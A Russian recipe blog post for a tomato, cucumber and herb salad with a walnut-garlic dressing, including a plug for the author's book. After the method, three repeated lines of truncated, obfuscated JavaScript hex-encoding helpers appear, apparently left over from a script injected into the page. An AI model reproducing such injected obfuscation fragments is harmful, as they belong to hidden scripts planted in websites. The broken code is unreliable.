Овощной салат с ореховой заправкой
В грузинской кухне тон задают грецкие орехи и пряные травы. На Украине тоже в избытке и того и другого. У меня во дворе растет огромное ореховое дерево, дающее густую тень в летнюю жару и обильный урожай вкусных и полезных орехов, которых нам хватает до следующего урожая. И я всегда рада найти новые, интересные рецепты с ними, что-то нетривиальное, вот как этот салат например. Он весьма прост на первый взгляд, крупно нарезанные овощи, много зелени, где же изюминка? А она в соусе, который пленяет сначала своим ярким ароматом, а потом еще более ярким вкусом. Сочетание грецких орехов и чеснока очень гармонично, соус получается густым, насыщенным и питательным. Легкие овощи сразу превращаются во вполне себе обед или ужин, особенно если дополнить салат мягким лавашом или лепешкой. И конечно такой салат великолепно подойдет к шашлыку из баранины, или телячьей корейке на гриле. Так что возьмите его на заметку к сезону пикников!
А все мои любимые салаты собраны в моей новой книге»Быстрые салаты», всем желающим я могу прислать книгу с автографом, пишите в личку!
Ингредиенты:
1.Помидоры 3 шт.
2.Огурцы 3 шт.
3.Базилик 1 пучок
4.Кинза 1 пучок
5.Орехи грецкие 5 шт.
6.Чеснок 2 зубчика
7.Масло растительное 3 ст.л.
8.Уксус винный 1 ст.л.
9.Соль
Способ приготовления:
Грецкие орехи очистить от скорлупы и измельчить в блендере вместе с чесноком и щепоткой соли. Добавить к орехам уксус и масло и перемешать соус до однородности. Посолить по вкусу, если нужно. Овощи и зелень крупно порезать и полить соусом. Подать немедленно!
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o